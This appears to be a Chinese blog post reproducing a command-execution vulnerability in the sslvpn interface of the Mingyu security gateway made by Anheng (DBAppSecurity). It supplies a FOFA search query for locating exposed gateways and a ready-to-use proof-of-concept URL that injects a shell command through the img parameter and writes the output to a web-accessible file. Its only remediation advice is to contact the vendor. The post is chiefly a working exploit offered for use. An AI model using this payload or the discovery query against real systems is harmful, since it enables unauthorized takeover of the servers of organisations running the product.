【漏洞复现】某厂商明御安全网关sslvpn命令执行漏洞

Nx01 产品简介

明御安全网关是杭州安恒信息技术股份有限公司研发的一款智慧化安全网关产品。这款产品秉持安全可视、简单有效的理念,以资产为视角,构建了全流程防御的下一代安全防护体系。

Nx02 漏洞描述

明御安全网关存在sslvpn命令执行漏洞,攻击者可通过此漏洞获取服务器控制权限。

Nx03 产品主页

fofa-query: web.body="明御安全网关"

Nx04 漏洞复现

POC:

复制代码
/sslvpn/sslvpn_client.php?client=logoImg&img=x%20/tmp|echo%20%60ifconfig%60%20|tee%20/usr/local/webui/sslvpn/ceshi.txt|ls

拼接URL/sslvpn/ceshi.txt

Nx05 修复建议

建议联系软件厂商进行处理。

相关推荐
Flynt4 天前
npm v12 来了:allowScripts 默认关闭,我的项目差点跑不起来
安全·npm·node.js
冬奇Lab9 天前
Skill 系列(02):Skill 安全风险——三类攻击面的实战测试
人工智能·安全·开源
Aphasia31112 天前
VPN 与内网穿透
安全
Mr_愚人派13 天前
当"Claude"不再是 Claude:一次第三方 API 代理引发的 AI 身份伪造排查实录
人工智能·安全
DaLi Yao14 天前
【无标题】
人工智能·安全
Alsn8614 天前
等待学习-学习目录:Docker 容器安全攻防
学习·安全·docker
网络研究院14 天前
2026年网络安全
网络·安全·法律·法规·趋势·发展
酣大智14 天前
ARP代理--工作原理
运维·网络·arp·arp代理
treesforest14 天前
AI安全系统如何识别异常访问?IP风险识别正在成为关键能力
网络·人工智能·tcp/ip·安全·web安全
shushangyun_14 天前
2026年快消品B2B系统推荐:支持终端门店订货、促销政策自动化的工具?
java·运维·网络·数据库·人工智能·spring·自动化